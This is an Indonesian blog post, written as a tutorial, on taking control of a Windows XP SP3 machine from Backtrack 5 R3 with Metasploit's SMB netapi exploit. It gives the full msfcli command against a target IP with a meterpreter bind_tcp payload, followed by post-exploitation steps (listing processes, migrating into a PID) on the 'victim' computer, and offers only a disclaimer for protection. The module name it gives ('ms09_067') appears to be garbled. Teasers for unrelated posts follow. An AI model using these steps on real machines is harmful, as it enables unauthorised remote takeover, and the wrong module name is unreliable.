Skip to main content

Exploit Windows XP with Exploit Netapi

hello!!!


sekarang saya mau kasih tutorial bagaimana untuk Exploit Windows XP SP3 dengan Backtrack 5 R3. untuk melakukan exploit, kita akan menggunakan tools penetration testing yang sudah terinstall default di Backtrack 5 R3 yaitu Metasploit Framework(MSF). dalam kerjanya MSF menggunakan module exploit yang sudah tersimpan dalam toolsnya. MSF mempunyai module Exploit yang sangat banyak, dalam kali saya akan menggunakan salah satu modulenya yaitu "windows/smb/ms09_067_netapi" yang sudah terkenal.  :a

tanpa banyak kata lagi. langsung saja ke langkah-langkahnya. :

1. buka terminal.
2. ketik msfcli windows/smb/ms09_067_netapi RHOST=192.168.88.93 PAYLOAD=windows/meterpreter/bind_tcp E
( saya asumsikan Kalian sudah mengetahui IP VIctim nya)
3. tunggu beberapa detik, jika berhasil akan muncul "meterpreter>".
(syarat untuk exploit berhasil adalah firewall dalam victim harus terbuka/nonaktif).
4. setelah masuk meterpreter. kalian terserah mau ngapain. karna komputer korban sudah kalian kendalikan. ^..^
5. untuk lebih leluasa kalian harus mendapatkan user privelage target. dengan cara "migrate" kedalam salah satu process yang ada.
6. caranya ketik "ps".
7. ketik "migrate 644 " angka 644 bisa anda ganti dengan angka yang terdapat pada PID salah satu processnya.
dalam tutorial ini saya sengaja tidak memberikan shortcut karna saya sudah menyiapakan video untuk pembelajaran anda dibawah ini :


Video Tutorial Exploit Netapi

sekian tutorial saya. apabila ada yang tidak jelas bisa kalian tanyakan lewat kolom komentar.

DB : TUTORIAL INI DIPERUNTUKAN HANYA UNTUK PENGETAHUAN SEMATA. SEGALA TINDAKAN DARI USER YANG MENGGUNAKAN TUTORIAL INI. TIDAK DALAM TANGGUNG JAWAB PENULIS(SAYA).

semoga bermanfaat dan sampai jumpa....  :b   :c :d :f :g
:h :i

Popular posts from this blog

OpenVPN Alternatif Solusi Menanggulangi Blokir dari KOMINFO

Sejak akhir juli 2022 kemaren indonesia di gegerkan dengan tindakan kominfo atas diblokirnya banyak platform digital karna tidak mendaftar PSE, terutama paypal dan plaform game (steam, epic game dll). keputusan ini semakin membuat netizen geram dikarenakan platform judi online malah disetujui untuk beroperasi karna sudah daftar PSE. Jujur menurut saya memang keputusan ini sejak awal saya dengar sudah mengada-ada karna sangat aneh memblokir semua platform digital yang jumlahnya tidak terhitung banyaknya dan hanya membolehkan akses platform yang sudah mendaftar yang jumlahnya hanya ratusan.  saya sebagai developer juga merasa aneh banget ini kebijakan apalagi platform development juga banyak yang di blacklist oleh kominfo seperti, github, gitlab, bitbucket, even website CDN pun di blacklist. astaga wkwkwk. anyway terlepas dari kebijakan konyol ini, saya mau berbagi tips cara agar tetep bisa mengakses semua platform tersebut tanpa ada halangan, yaitu dengan menggunakan VPN. banyak ban...

Create MVC Pattern Using Echo Framework #GolangDev

pixabay.com Hi, Back again. today I am gonna share about Go Language, yes it is a new programming language that really fast growing this day, so many startup using it, especially in indonesia, there is a Gojek, Dana, Tiket and many more. Go Lang is a programming language found by google engineer, this language is a multi paradigm language, you could use it as functional programming or treat it like an OOP bases. Echo is an framework that use Golang as a main language, to use a fast and reliable backend/web apps, as you know Golang has a really fast performance than other language, one of the reason is because its compiled not interpreted, so the Echo claim that its 10x faster. insane right ? Actually I didn't test the performance yet, but yeah for newbie like me in golang its not the main thing that you must understand, so the thing that we should know is how we actually can do with Golang.  I am person with MVC bases, before jump to golang, I have experience with La...

The Advantage of Using HTTP Default Authorization Scheme #DigitalSecurity

pixabay.com Hello Everyone, This day I would like to introduce you to the default header for authorization in HTTP. HTTP auth scheme is a guide or standardization scheme for the authorization header in the HTTP protocol. this standard is using key Authorization in the header and followed by a value that usually filled by key or token. for example : Authorization : <type> <key/token> this standard is the solution of the key header for authorization that really random was provided by developers to build an authorization header for their application, in my experience, developers used to "token" for their key in the header that usually followed by the hash value. the random key makes developers using more time for writing code for getting header key and validating the value which is you could use the library and focus on writing the logic of your application. Depend on Mozilla site , HTTP auth scheme divided by 4 types, such as : Basic  (see  RF...